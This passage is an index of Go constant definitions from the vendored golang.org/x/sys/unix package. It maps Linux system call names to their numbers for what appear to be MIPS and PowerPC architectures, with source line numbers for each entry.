SYS_REQUEST_KEY = 4281 constant SYS_KEYCTL (line 290) | SYS_KEYCTL = 4282 constant SYS_SET_THREAD_AREA (line 291) | SYS_SET_THREAD_AREA = 4283 constant SYS_INOTIFY_INIT (line 292) | SYS_INOTIFY_INIT = 4284 constant SYS_INOTIFY_ADD_WATCH (line 293) | SYS_INOTIFY_ADD_WATCH = 4285 constant SYS_INOTIFY_RM_WATCH (line 294) | SYS_INOTIFY_RM_WATCH = 4286 constant SYS_MIGRATE_PAGES (line 295) | SYS_MIGRATE_PAGES = 4287 constant SYS_OPENAT (line 296) | SYS_OPENAT = 4288 constant SYS_MKDIRAT (line 297) | SYS_MKDIRAT = 4289 constant SYS_MKNODAT (line 298) | SYS_MKNODAT = 4290 constant SYS_FCHOWNAT (line 299) | SYS_FCHOWNAT = 4291 constant SYS_FUTIMESAT (line 300) | SYS_FUTIMESAT = 4292 constant SYS_FSTATAT64 (line 301) | SYS_FSTATAT64 = 4293 constant SYS_UNLINKAT (line 302) | SYS_UNLINKAT = 4294 constant SYS_RENAMEAT (line 303) | SYS_RENAMEAT = 4295 constant SYS_LINKAT (line 304) | SYS_LINKAT = 4296 constant SYS_SYMLINKAT (line 305) | SYS_SYMLINKAT = 4297 constant SYS_READLINKAT (line 306) | SYS_READLINKAT = 4298 constant SYS_FCHMODAT (line 307) | SYS_FCHMODAT = 4299 constant SYS_FACCESSAT (line 308) | SYS_FACCESSAT = 4300 constant SYS_PSELECT6 (line 309) | SYS_PSELECT6 = 4301 constant SYS_PPOLL (line 310) | SYS_PPOLL = 4302 constant SYS_UNSHARE (line 311) | SYS_UNSHARE = 4303 constant SYS_SPLICE (line 312) | SYS_SPLICE = 4304 constant SYS_SYNC_FILE_RANGE (line 313) | SYS_SYNC_FILE_RANGE = 4305 constant SYS_TEE (line 314) | SYS_TEE = 4306 constant SYS_VMSPLICE (line 315) | SYS_VMSPLICE = 4307 constant SYS_MOVE_PAGES (line 316) | SYS_MOVE_PAGES = 4308 constant SYS_SET_ROBUST_LIST (line 317) | SYS_SET_ROBUST_LIST = 4309 constant SYS_GET_ROBUST_LIST (line 318) | SYS_GET_ROBUST_LIST = 4310 constant SYS_KEXEC_LOAD (line 319) | SYS_KEXEC_LOAD = 4311 constant SYS_GETCPU (line 320) | SYS_GETCPU = 4312 constant SYS_EPOLL_PWAIT (line 321) | SYS_EPOLL_PWAIT = 4313 constant SYS_IOPRIO_SET (line 322) | SYS_IOPRIO_SET = 4314 constant SYS_IOPRIO_GET (line 323) | SYS_IOPRIO_GET = 4315 constant SYS_UTIMENSAT (line 324) | SYS_UTIMENSAT = 4316 constant SYS_SIGNALFD (line 325) | SYS_SIGNALFD = 4317 constant SYS_TIMERFD (line 326) | SYS_TIMERFD = 4318 constant SYS_EVENTFD (line 327) | SYS_EVENTFD = 4319 constant SYS_FALLOCATE (line 328) | SYS_FALLOCATE = 4320 constant SYS_TIMERFD_CREATE (line 329) | SYS_TIMERFD_CREATE = 4321 constant SYS_TIMERFD_GETTIME (line 330) | SYS_TIMERFD_GETTIME = 4322 constant SYS_TIMERFD_SETTIME (line 331) | SYS_TIMERFD_SETTIME = 4323 constant SYS_SIGNALFD4 (line 332) | SYS_SIGNALFD4 = 4324 constant SYS_EVENTFD2 (line 333) | SYS_EVENTFD2 = 4325 constant SYS_EPOLL_CREATE1 (line 334) | SYS_EPOLL_CREATE1 = 4326 constant SYS_DUP3 (line 335) | SYS_DUP3 = 4327 constant SYS_PIPE2 (line 336) | SYS_PIPE2 = 4328 constant SYS_INOTIFY_INIT1 (line 337) | SYS_INOTIFY_INIT1 = 4329 constant SYS_PREADV (line 338) | SYS_PREADV = 4330 constant SYS_PWRITEV (line 339) | SYS_PWRITEV = 4331 constant SYS_RT_TGSIGQUEUEINFO (line 340) | SYS_RT_TGSIGQUEUEINFO = 4332 constant SYS_PERF_EVENT_OPEN (line 341) | SYS_PERF_EVENT_OPEN = 4333 constant SYS_ACCEPT4 (line 342) | SYS_ACCEPT4 = 4334 constant SYS_RECVMMSG (line 343) | SYS_RECVMMSG = 4335 constant SYS_FANOTIFY_INIT (line 344) | SYS_FANOTIFY_INIT = 4336 constant SYS_FANOTIFY_MARK (line 345) | SYS_FANOTIFY_MARK = 4337 constant SYS_PRLIMIT64 (line 346) | SYS_PRLIMIT64 = 4338 constant SYS_NAME_TO_HANDLE_AT (line 347) | SYS_NAME_TO_HANDLE_AT = 4339 constant SYS_OPEN_BY_HANDLE_AT (line 348) | SYS_OPEN_BY_HANDLE_AT = 4340 constant SYS_CLOCK_ADJTIME (line 349) | SYS_CLOCK_ADJTIME = 4341 constant SYS_SYNCFS (line 350) | SYS_SYNCFS = 4342 constant SYS_SENDMMSG (line 351) | SYS_SENDMMSG = 4343 constant SYS_SETNS (line 352) | SYS_SETNS = 4344 constant SYS_PROCESS_VM_READV (line 353) | SYS_PROCESS_VM_READV = 4345 constant SYS_PROCESS_VM_WRITEV (line 354) | SYS_PROCESS_VM_WRITEV = 4346 constant SYS_KCMP (line 355) | SYS_KCMP = 4347 constant SYS_FINIT_MODULE (line 356) | SYS_FINIT_MODULE = 4348 constant SYS_SCHED_SETATTR (line 357) | SYS_SCHED_SETATTR = 4349 constant SYS_SCHED_GETATTR (line 358) | SYS_SCHED_GETATTR = 4350 constant SYS_RENAMEAT2 (line 359) | SYS_RENAMEAT2 = 4351 constant SYS_SECCOMP (line 360) | SYS_SECCOMP = 4352 constant SYS_GETRANDOM (line 361) | SYS_GETRANDOM = 4353 constant SYS_MEMFD_CREATE (line 362) | SYS_MEMFD_CREATE = 4354 constant SYS_BPF (line 363) | SYS_BPF = 4355 constant SYS_EXECVEAT (line 364) | SYS_EXECVEAT = 4356 constant SYS_USERFAULTFD (line 365) | SYS_USERFAULTFD = 4357 constant SYS_MEMBARRIER (line 366) | SYS_MEMBARRIER = 4358 constant SYS_MLOCK2 (line 367) | SYS_MLOCK2 = 4359 constant SYS_COPY_FILE_RANGE (line 368) | SYS_COPY_FILE_RANGE = 4360 constant SYS_PREADV2 (line 369) | SYS_PREADV2 = 4361 constant SYS_PWRITEV2 (line 370) | SYS_PWRITEV2 = 4362 constant SYS_PKEY_MPROTECT (line 371) | SYS_PKEY_MPROTECT = 4363 constant SYS_PKEY_ALLOC (line 372) | SYS_PKEY_ALLOC = 4364 constant SYS_PKEY_FREE (line 373) | SYS_PKEY_FREE = 4365 constant SYS_STATX (line 374) | SYS_STATX = 4366 constant SYS_RSEQ (line 375) | SYS_RSEQ = 4367 constant SYS_IO_PGETEVENTS (line 376) | SYS_IO_PGETEVENTS = 4368 constant SYS_SEMGET (line 377) | SYS_SEMGET = 4393 constant SYS_SEMCTL (line 378) | SYS_SEMCTL = 4394 constant SYS_SHMGET (line 379) | SYS_SHMGET = 4395 constant SYS_SHMCTL (line 380) | SYS_SHMCTL = 4396 constant SYS_SHMAT (line 381) | SYS_SHMAT = 4397 constant SYS_SHMDT (line 382) | SYS_SHMDT = 4398 constant SYS_MSGGET (line 383) | SYS_MSGGET = 4399 constant SYS_MSGSND (line 384) | SYS_MSGSND = 4400 constant SYS_MSGRCV (line 385) | SYS_MSGRCV = 4401 constant SYS_MSGCTL (line 386) | SYS_MSGCTL = 4402 constant SYS_CLOCK_GETTIME64 (line 387) | SYS_CLOCK_GETTIME64 = 4403 constant SYS_CLOCK_SETTIME64 (line 388) | SYS_CLOCK_SETTIME64 = 4404 constant SYS_CLOCK_ADJTIME64 (line 389) | SYS_CLOCK_ADJTIME64 = 4405 constant SYS_CLOCK_GETRES_TIME64 (line 390) | SYS_CLOCK_GETRES_TIME64 = 4406 constant SYS_CLOCK_NANOSLEEP_TIME64 (line 391) | SYS_CLOCK_NANOSLEEP_TIME64 = 4407 constant SYS_TIMER_GETTIME64 (line 392) | SYS_TIMER_GETTIME64 = 4408 constant SYS_TIMER_SETTIME64 (line 393) | SYS_TIMER_SETTIME64 = 4409 constant SYS_TIMERFD_GETTIME64 (line 394) | SYS_TIMERFD_GETTIME64 = 4410 constant SYS_TIMERFD_SETTIME64 (line 395) | SYS_TIMERFD_SETTIME64 = 4411 constant SYS_UTIMENSAT_TIME64 (line 396) | SYS_UTIMENSAT_TIME64 = 4412 constant SYS_PSELECT6_TIME64 (line 397) | SYS_PSELECT6_TIME64 = 4413 constant SYS_PPOLL_TIME64 (line 398) | SYS_PPOLL_TIME64 = 4414 constant SYS_IO_PGETEVENTS_TIME64 (line 399) | SYS_IO_PGETEVENTS_TIME64 = 4416 constant SYS_RECVMMSG_TIME64 (line 400) | SYS_RECVMMSG_TIME64 = 4417 constant SYS_MQ_TIMEDSEND_TIME64 (line 401) | SYS_MQ_TIMEDSEND_TIME64 = 4418 constant SYS_MQ_TIMEDRECEIVE_TIME64 (line 402) | SYS_MQ_TIMEDRECEIVE_TIME64 = 4419 constant SYS_SEMTIMEDOP_TIME64 (line 403) | SYS_SEMTIMEDOP_TIME64 = 4420 constant SYS_RT_SIGTIMEDWAIT_TIME64 (line 404) | SYS_RT_SIGTIMEDWAIT_TIME64 = 4421 constant SYS_FUTEX_TIME64 (line 405) | SYS_FUTEX_TIME64 = 4422 constant SYS_SCHED_RR_GET_INTERVAL_TIME64 (line 406) | SYS_SCHED_RR_GET_INTERVAL_TIME64 = 4423 constant SYS_PIDFD_SEND_SIGNAL (line 407) | SYS_PIDFD_SEND_SIGNAL = 4424 constant SYS_IO_URING_SETUP (line 408) | SYS_IO_URING_SETUP = 4425 constant SYS_IO_URING_ENTER (line 409) | SYS_IO_URING_ENTER = 4426 constant SYS_IO_URING_REGISTER (line 410) | SYS_IO_URING_REGISTER = 4427 constant SYS_OPEN_TREE (line 411) | SYS_OPEN_TREE = 4428 constant SYS_MOVE_MOUNT (line 412) | SYS_MOVE_MOUNT = 4429 constant SYS_FSOPEN (line 413) | SYS_FSOPEN = 4430 constant SYS_FSCONFIG (line 414) | SYS_FSCONFIG = 4431 constant SYS_FSMOUNT (line 415) | SYS_FSMOUNT = 4432 constant SYS_FSPICK (line 416) | SYS_FSPICK = 4433 constant SYS_PIDFD_OPEN (line 417) | SYS_PIDFD_OPEN = 4434 constant SYS_CLONE3 (line 418) | SYS_CLONE3 = 4435 constant SYS_CLOSE_RANGE (line 419) | SYS_CLOSE_RANGE = 4436 constant SYS_OPENAT2 (line 420) | SYS_OPENAT2 = 4437 constant SYS_PIDFD_GETFD (line 421) | SYS_PIDFD_GETFD = 4438 constant SYS_FACCESSAT2 (line 422) | SYS_FACCESSAT2 = 4439 constant SYS_PROCESS_MADVISE (line 423) | SYS_PROCESS_MADVISE = 4440 constant SYS_EPOLL_PWAIT2 (line 424) | SYS_EPOLL_PWAIT2 = 4441 constant SYS_MOUNT_SETATTR (line 425) | SYS_MOUNT_SETATTR = 4442 constant SYS_QUOTACTL_FD (line 426) | SYS_QUOTACTL_FD = 4443 constant SYS_LANDLOCK_CREATE_RULESET (line 427) | SYS_LANDLOCK_CREATE_RULESET = 4444 constant SYS_LANDLOCK_ADD_RULE (line 428) | SYS_LANDLOCK_ADD_RULE = 4445 constant SYS_LANDLOCK_RESTRICT_SELF (line 429) | SYS_LANDLOCK_RESTRICT_SELF = 4446 constant SYS_PROCESS_MRELEASE (line 430) | SYS_PROCESS_MRELEASE = 4448 constant SYS_FUTEX_WAITV (line 431) | SYS_FUTEX_WAITV = 4449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 432) | SYS_SET_MEMPOLICY_HOME_NODE = 4450 constant SYS_CACHESTAT (line 433) | SYS_CACHESTAT = 4451 constant SYS_FCHMODAT2 (line 434) | SYS_FCHMODAT2 = 4452 constant SYS_MAP_SHADOW_STACK (line 435) | SYS_MAP_SHADOW_STACK = 4453 constant SYS_FUTEX_WAKE (line 436) | SYS_FUTEX_WAKE = 4454 constant SYS_FUTEX_WAIT (line 437) | SYS_FUTEX_WAIT = 4455 constant SYS_FUTEX_REQUEUE (line 438) | SYS_FUTEX_REQUEUE = 4456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_ppc.go constant SYS_RESTART_SYSCALL (line 9) | SYS_RESTART_SYSCALL = 0 constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_WAITPID (line 16) | SYS_WAITPID = 7 constant SYS_CREAT (line 17) | SYS_CREAT = 8 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_EXECVE (line 20) | SYS_EXECVE = 11 constant SYS_CHDIR (line 21) | SYS_CHDIR = 12 constant SYS_TIME (line 22) | SYS_TIME = 13 constant SYS_MKNOD (line 23) | SYS_MKNOD = 14 constant SYS_CHMOD (line 24) | SYS_CHMOD = 15 constant SYS_LCHOWN (line 25) | SYS_LCHOWN = 16 constant SYS_BREAK (line 26) | SYS_BREAK = 17 constant SYS_OLDSTAT (line 27) | SYS_OLDSTAT = 18 constant SYS_LSEEK (line 28) | SYS_LSEEK = 19 constant SYS_GETPID (line 29) | SYS_GETPID = 20 constant SYS_MOUNT (line 30) | SYS_MOUNT = 21 constant SYS_UMOUNT (line 31) | SYS_UMOUNT = 22 constant SYS_SETUID (line 32) | SYS_SETUID = 23 constant SYS_GETUID (line 33) | SYS_GETUID = 24 constant SYS_STIME (line 34) | SYS_STIME = 25 constant SYS_PTRACE (line 35) | SYS_PTRACE = 26 constant SYS_ALARM (line 36) | SYS_ALARM = 27 constant SYS_OLDFSTAT (line 37) | SYS_OLDFSTAT = 28 constant SYS_PAUSE (line 38) | SYS_PAUSE = 29 constant SYS_UTIME (line 39) | SYS_UTIME = 30 constant SYS_STTY (line 40) | SYS_STTY = 31 constant SYS_GTTY (line 41) | SYS_GTTY = 32 constant SYS_ACCESS (line 42) | SYS_ACCESS = 33 constant SYS_NICE (line 43) | SYS_NICE = 34 constant SYS_FTIME (line 44) | SYS_FTIME = 35 constant SYS_SYNC (line 45) | SYS_SYNC = 36 constant SYS_KILL (line 46) | SYS_KILL = 37 constant SYS_RENAME (line 47) | SYS_RENAME = 38 constant SYS_MKDIR (line 48) | SYS_MKDIR = 39 constant SYS_RMDIR (line 49) | SYS_RMDIR = 40 constant SYS_DUP (line 50) | SYS_DUP = 41 constant SYS_PIPE (line 51) | SYS_PIPE = 42 constant SYS_TIMES (line 52) | SYS_TIMES = 43 constant SYS_PROF (line 53) | SYS_PROF = 44 constant SYS_BRK (line 54) | SYS_BRK = 45 constant SYS_SETGID (line 55) | SYS_SETGID = 46 constant SYS_GETGID (line 56) | SYS_GETGID = 47 constant SYS_SIGNAL (line 57) | SYS_SIGNAL = 48 constant SYS_GETEUID (line 58) | SYS_GETEUID = 49 constant SYS_GETEGID (line 59) | SYS_GETEGID = 50 constant SYS_ACCT (line 60) | SYS_ACCT = 51 constant SYS_UMOUNT2 (line 61) | SYS_UMOUNT2 = 52 constant SYS_LOCK (line 62) | SYS_LOCK = 53 constant SYS_IOCTL (line 63) | SYS_IOCTL = 54 constant SYS_FCNTL (line 64) | SYS_FCNTL = 55 constant SYS_MPX (line 65) | SYS_MPX = 56 constant SYS_SETPGID (line 66) | SYS_SETPGID = 57 constant SYS_ULIMIT (line 67) | SYS_ULIMIT = 58 constant SYS_OLDOLDUNAME (line 68) | SYS_OLDOLDUNAME = 59 constant SYS_UMASK (line 69) | SYS_UMASK = 60 constant SYS_CHROOT (line 70) | SYS_CHROOT = 61 constant SYS_USTAT (line 71) | SYS_USTAT = 62 constant SYS_DUP2 (line 72) | SYS_DUP2 = 63 constant SYS_GETPPID (line 73) | SYS_GETPPID = 64 constant SYS_GETPGRP (line 74) | SYS_GETPGRP = 65 constant SYS_SETSID (line 75) | SYS_SETSID = 66 constant SYS_SIGACTION (line 76) | SYS_SIGACTION = 67 constant SYS_SGETMASK (line 77) | SYS_SGETMASK = 68 constant SYS_SSETMASK (line 78) | SYS_SSETMASK = 69 constant SYS_SETREUID (line 79) | SYS_SETREUID = 70 constant SYS_SETREGID (line 80) | SYS_SETREGID = 71 constant SYS_SIGSUSPEND (line 81) | SYS_SIGSUSPEND = 72 constant SYS_SIGPENDING (line 82) | SYS_SIGPENDING = 73 constant SYS_SETHOSTNAME (line 83) | SYS_SETHOSTNAME = 74 constant SYS_SETRLIMIT (line 84) | SYS_SETRLIMIT = 75 constant SYS_GETRLIMIT (line 85) | SYS_GETRLIMIT = 76 constant SYS_GETRUSAGE (line 86) | SYS_GETRUSAGE = 77 constant SYS_GETTIMEOFDAY (line 87) | SYS_GETTIMEOFDAY = 78 constant SYS_SETTIMEOFDAY (line 88) | SYS_SETTIMEOFDAY = 79 constant SYS_GETGROUPS (line 89) | SYS_GETGROUPS = 80 constant SYS_SETGROUPS (line 90) | SYS_SETGROUPS = 81 constant SYS_SELECT (line 91) | SYS_SELECT = 82 constant SYS_SYMLINK (line 92) | SYS_SYMLINK = 83 constant SYS_OLDLSTAT (line 93) | SYS_OLDLSTAT = 84 constant SYS_READLINK (line 94) | SYS_READLINK = 85 constant SYS_USELIB (line 95) | SYS_USELIB = 86 constant SYS_SWAPON (line 96) | SYS_SWAPON = 87 constant SYS_REBOOT (line 97) | SYS_REBOOT = 88 constant SYS_READDIR (line 98) | SYS_READDIR = 89 constant SYS_MMAP (line 99) | SYS_MMAP = 90 constant SYS_MUNMAP (line 100) | SYS_MUNMAP = 91 constant SYS_TRUNCATE (line 101) | SYS_TRUNCATE = 92 constant SYS_FTRUNCATE (line 102) | SYS_FTRUNCATE = 93 constant SYS_FCHMOD (line 103) | SYS_FCHMOD = 94 constant SYS_FCHOWN (line 104) | SYS_FCHOWN = 95 constant SYS_GETPRIORITY (line 105) | SYS_GETPRIORITY = 96 constant SYS_SETPRIORITY (line 106) | SYS_SETPRIORITY = 97 constant SYS_PROFIL (line 107) | SYS_PROFIL = 98 constant SYS_STATFS (line 108) | SYS_STATFS = 99 constant SYS_FSTATFS (line 109) | SYS_FSTATFS = 100 constant SYS_IOPERM (line 110) | SYS_IOPERM = 101 constant SYS_SOCKETCALL (line 111) | SYS_SOCKETCALL = 102 constant SYS_SYSLOG (line 112) | SYS_SYSLOG = 103 constant SYS_SETITIMER (line 113) | SYS_SETITIMER = 104 constant SYS_GETITIMER (line 114) | SYS_GETITIMER = 105 constant SYS_STAT (line 115) | SYS_STAT = 106 constant SYS_LSTAT (line 116) | SYS_LSTAT = 107 constant SYS_FSTAT (line 117) | SYS_FSTAT = 108 constant SYS_OLDUNAME (line 118) | SYS_OLDUNAME = 109 constant SYS_IOPL (line 119) | SYS_IOPL = 110 constant SYS_VHANGUP (line 120) | SYS_VHANGUP = 111 constant SYS_IDLE (line 121) | SYS_IDLE = 112 constant SYS_VM86 (line 122) | SYS_VM86 = 113 constant SYS_WAIT4 (line 123) | SYS_WAIT4 = 114 constant SYS_SWAPOFF (line 124) | SYS_SWAPOFF = 115 constant SYS_SYSINFO (line 125) | SYS_SYSINFO = 116 constant SYS_IPC (line 126) | SYS_IPC = 117 constant SYS_FSYNC (line 127) | SYS_FSYNC = 118 constant SYS_SIGRETURN (line 128) | SYS_SIGRETURN = 119 constant SYS_CLONE (line 129) | SYS_CLONE = 120 constant SYS_SETDOMAINNAME (line 130) | SYS_SETDOMAINNAME = 121 constant SYS_UNAME (line 131) | SYS_UNAME = 122 constant SYS_MODIFY_LDT (line 132) | SYS_MODIFY_LDT = 123 constant SYS_ADJTIMEX (line 133) | SYS_ADJTIMEX = 124 constant SYS_MPROTECT (line 134) | SYS_MPROTECT = 125 constant SYS_SIGPROCMASK (line 135) | SYS_SIGPROCMASK = 126 constant SYS_CREATE_MODULE (line 136) | SYS_CREATE_MODULE = 127 constant SYS_INIT_MODULE (line 137) | SYS_INIT_MODULE = 128 constant SYS_DELETE_MODULE (line 138) | SYS_DELETE_MODULE = 129 constant SYS_GET_KERNEL_SYMS (line 139) | SYS_GET_KERNEL_SYMS = 130 constant SYS_QUOTACTL (line 140) | SYS_QUOTACTL = 131 constant SYS_GETPGID (line 141) | SYS_GETPGID = 132 constant SYS_FCHDIR (line 142) | SYS_FCHDIR = 133 constant SYS_BDFLUSH (line 143) | SYS_BDFLUSH = 134 constant SYS_SYSFS (line 144) | SYS_SYSFS = 135 constant SYS_PERSONALITY (line 145) | SYS_PERSONALITY = 136 constant SYS_AFS_SYSCALL (line 146) | SYS_AFS_SYSCALL = 137 constant SYS_SETFSUID (line 147) | SYS_SETFSUID = 138 constant SYS_SETFSGID (line 148) | SYS_SETFSGID = 139 constant SYS__LLSEEK (line 149) | SYS__LLSEEK = 140 constant SYS_GETDENTS (line 150) | SYS_GETDENTS = 141 constant SYS__NEWSELECT (line 151) | SYS__NEWSELECT = 142 constant SYS_FLOCK (line 152) | SYS_FLOCK = 143 constant SYS_MSYNC (line 153) | SYS_MSYNC = 144 constant SYS_READV (line 154) | SYS_READV = 145 constant SYS_WRITEV (line 155) | SYS_WRITEV = 146 constant SYS_GETSID (line 156) | SYS_GETSID = 147 constant SYS_FDATASYNC (line 157) | SYS_FDATASYNC = 148 constant SYS__SYSCTL (line 158) | SYS__SYSCTL = 149 constant SYS_MLOCK (line 159) | SYS_MLOCK = 150 constant SYS_MUNLOCK (line 160) | SYS_MUNLOCK = 151 constant SYS_MLOCKALL (line 161) | SYS_MLOCKALL = 152 constant SYS_MUNLOCKALL (line 162) | SYS_MUNLOCKALL = 153 constant SYS_SCHED_SETPARAM (line 163) | SYS_SCHED_SETPARAM = 154 constant SYS_SCHED_GETPARAM (line 164) | SYS_SCHED_GETPARAM = 155 constant SYS_SCHED_SETSCHEDULER (line 165) | SYS_SCHED_SETSCHEDULER = 156 constant SYS_SCHED_GETSCHEDULER (line 166) | SYS_SCHED_GETSCHEDULER = 157 constant SYS_SCHED_YIELD (line 167) | SYS_SCHED_YIELD = 158 constant SYS_SCHED_GET_PRIORITY_MAX (line 168) | SYS_SCHED_GET_PRIORITY_MAX = 159 constant SYS_SCHED_GET_PRIORITY_MIN (line 169) | SYS_SCHED_GET_PRIORITY_MIN = 160 constant SYS_SCHED_RR_GET_INTERVAL (line 170) | SYS_SCHED_RR_GET_INTERVAL = 161 constant SYS_NANOSLEEP (line 171) | SYS_NANOSLEEP = 162 constant SYS_MREMAP (line 172) | SYS_MREMAP = 163 constant SYS_SETRESUID (line 173) | SYS_SETRESUID = 164 constant SYS_GETRESUID (line 174) | SYS_GETRESUID = 165 constant SYS_QUERY_MODULE (line 175) | SYS_QUERY_MODULE = 166 constant SYS_POLL (line 176) | SYS_POLL = 167 constant SYS_NFSSERVCTL (line 177) | SYS_NFSSERVCTL = 168 constant SYS_SETRESGID (line 178) | SYS_SETRESGID = 169 constant SYS_GETRESGID (line 179) | SYS_GETRESGID = 170 constant SYS_PRCTL (line 180) | SYS_PRCTL = 171 constant SYS_RT_SIGRETURN (line 181) | SYS_RT_SIGRETURN = 172 constant SYS_RT_SIGACTION (line 182) | SYS_RT_SIGACTION = 173 constant SYS_RT_SIGPROCMASK (line 183) | SYS_RT_SIGPROCMASK = 174 constant SYS_RT_SIGPENDING (line 184) | SYS_RT_SIGPENDING = 175 constant SYS_RT_SIGTIMEDWAIT (line 185) | SYS_RT_SIGTIMEDWAIT = 176 constant SYS_RT_SIGQUEUEINFO (line 186) | SYS_RT_SIGQUEUEINFO = 177 constant SYS_RT_SIGSUSPEND (line 187) | SYS_RT_SIGSUSPEND = 178 constant SYS_PREAD64 (line 188) | SYS_PREAD64 = 179 constant SYS_PWRITE64 (line 189) | SYS_PWRITE64 = 180 constant SYS_CHOWN (line 190) | SYS_CHOWN = 181 constant SYS_GETCWD (line 191) | SYS_GETCWD = 182 constant SYS_CAPGET (line 192) | SYS_CAPGET = 183 constant SYS_CAPSET (line 193) | SYS_CAPSET = 184 constant SYS_SIGALTSTACK (line 194) | SYS_SIGALTSTACK = 185 constant SYS_SENDFILE (line 195) | SYS_SENDFILE = 186 constant SYS_GETPMSG (line 196) | SYS_GETPMSG = 187 constant SYS_PUTPMSG (line 197) | SYS_PUTPMSG = 188 constant SYS_VFORK (line 198) | SYS_VFORK = 189 constant SYS_UGETRLIMIT (line 199) | SYS_UGETRLIMIT = 190 constant SYS_READAHEAD (line 200) | SYS_READAHEAD = 191 constant SYS_MMAP2 (line 201) | SYS_MMAP2 = 192 constant SYS_TRUNCATE64 (line 202) | SYS_TRUNCATE64 = 193 constant SYS_FTRUNCATE64 (line 203) | SYS_FTRUNCATE64 = 194 constant SYS_STAT64 (line 204) | SYS_STAT64 = 195 constant SYS_LSTAT64 (line 205) | SYS_LSTAT64 = 196 constant SYS_FSTAT64 (line 206) | SYS_FSTAT64 = 197 constant SYS_PCICONFIG_READ (line 207) | SYS_PCICONFIG_READ = 198 constant SYS_PCICONFIG_WRITE (line 208) | SYS_PCICONFIG_WRITE = 199 constant SYS_PCICONFIG_IOBASE (line 209) | SYS_PCICONFIG_IOBASE = 200 constant SYS_MULTIPLEXER (line 210) | SYS_MULTIPLEXER = 201 constant SYS_GETDENTS64 (line 211) | SYS_GETDENTS64 = 202 constant SYS_PIVOT_ROOT (line 212) | SYS_PIVOT_ROOT = 203 constant SYS_FCNTL64 (line 213) | SYS_FCNTL64 = 204 constant SYS_MADVISE (line 214) | SYS_MADVISE = 205 constant SYS_MINCORE (line 215) | SYS_MINCORE = 206 constant SYS_GETTID (line 216) | SYS_GETTID = 207 constant SYS_TKILL (line 217) | SYS_TKILL = 208 constant SYS_SETXATTR (line 218) | SYS_SETXATTR = 209 constant SYS_LSETXATTR (line 219) | SYS_LSETXATTR = 210 constant SYS_FSETXATTR (line 220) | SYS_FSETXATTR = 211 constant SYS_GETXATTR (line 221) | SYS_GETXATTR = 212 constant SYS_LGETXATTR (line 222) | SYS_LGETXATTR = 213 constant SYS_FGETXATTR (line 223) | SYS_FGETXATTR = 214 constant SYS_LISTXATTR (line 224) | SYS_LISTXATTR = 215 constant SYS_LLISTXATTR (line 225) | SYS_LLISTXATTR = 216 constant SYS_FLISTXATTR (line 226) | SYS_FLISTXATTR = 217 constant SYS_REMOVEXATTR (line 227) | SYS_REMOVEXATTR = 218 constant SYS_LREMOVEXATTR (line 228) | SYS_LREMOVEXATTR = 219 constant SYS_FREMOVEXATTR (line 229) | SYS_FREMOVEXATTR = 220 constant SYS_FUTEX (line 230) | SYS_FUTEX = 221 constant SYS_SCHED_SETAFFINITY (line 231) | SYS_SCHED_SETAFFINITY = 222 constant SYS_SCHED_GETAFFINITY (line 232) | SYS_SCHED_GETAFFINITY = 223 constant SYS_TUXCALL (line 233) | SYS_TUXCALL = 225 constant SYS_SENDFILE64 (line 234) | SYS_SENDFILE64 = 226 constant SYS_IO_SETUP (line 235) | SYS_IO_SETUP = 227 constant SYS_IO_DESTROY (line 236) | SYS_IO_DESTROY = 228 constant SYS_IO_GETEVENTS (line 237) | SYS_IO_GETEVENTS = 229 constant SYS_IO_SUBMIT (line 238) | SYS_IO_SUBMIT = 230 constant SYS_IO_CANCEL (line 239) | SYS_IO_CANCEL = 231 constant SYS_SET_TID_ADDRESS (line 240) | SYS_SET_TID_ADDRESS = 232 constant SYS_FADVISE64 (line 241) | SYS_FADVISE64 = 233 constant SYS_EXIT_GROUP (line 242) | SYS_EXIT_GROUP = 234 constant SYS_LOOKUP_DCOOKIE (line 243) | SYS_LOOKUP_DCOOKIE = 235 constant SYS_EPOLL_CREATE (line 244) | SYS_EPOLL_CREATE = 236 constant SYS_EPOLL_CTL (line 245) | SYS_EPOLL_CTL = 237 constant SYS_EPOLL_WAIT (line 246) | SYS_EPOLL_WAIT = 238 constant SYS_REMAP_FILE_PAGES (line 247) | SYS_REMAP_FILE_PAGES = 239 constant SYS_TIMER_CREATE (line 248) | SYS_TIMER_CREATE = 240 constant SYS_TIMER_SETTIME (line 249) | SYS_TIMER_SETTIME = 241 constant SYS_TIMER_GETTIME (line 250) | SYS_TIMER_GETTIME = 242 constant SYS_TIMER_GETOVERRUN (line 251) | SYS_TIMER_GETOVERRUN = 243 constant SYS_TIMER_DELETE (line 252) | SYS_TIMER_DELETE = 244 constant SYS_CLOCK_SETTIME (line 253) | SYS_CLOCK_SETTIME = 245 constant SYS_CLOCK_GETTIME (line 254) | SYS_CLOCK_GETTIME = 246 constant SYS_CLOCK_GETRES (line 255) | SYS_CLOCK_GETRES = 247 constant SYS_CLOCK_NANOSLEEP (line 256) | SYS_CLOCK_NANOSLEEP = 248 constant SYS_SWAPCONTEXT (line 257) | SYS_SWAPCONTEXT = 249 constant SYS_TGKILL (line 258) | SYS_TGKILL = 250 constant SYS_UTIMES (line 259) | SYS_UTIMES = 251 constant SYS_STATFS64 (line 260) | SYS_STATFS64 = 252 constant SYS_FSTATFS64 (line 261) | SYS_FSTATFS64 = 253 constant SYS_FADVISE64_64 (line 262) | SYS_FADVISE64_64 = 254 constant SYS_RTAS (line 263) | SYS_RTAS = 255 constant SYS_SYS_DEBUG_SETCONTEXT (line 264) | SYS_SYS_DEBUG_SETCONTEXT = 256 constant SYS_MIGRATE_PAGES (line 265) | SYS_MIGRATE_PAGES = 258 constant SYS_MBIND (line 266) | SYS_MBIND = 259 constant SYS_GET_MEMPOLICY (line 267) | SYS_GET_MEMPOLICY = 260 constant SYS_SET_MEMPOLICY (line 268) | SYS_SET_MEMPOLICY = 261 constant SYS_MQ_OPEN (line 269) | SYS_MQ_OPEN = 262 constant SYS_MQ_UNLINK (line 270) | SYS_MQ_UNLINK = 263 constant SYS_MQ_TIMEDSEND (line 271) | SYS_MQ_TIMEDSEND = 264 constant SYS_MQ_TIMEDRECEIVE (line 272) | 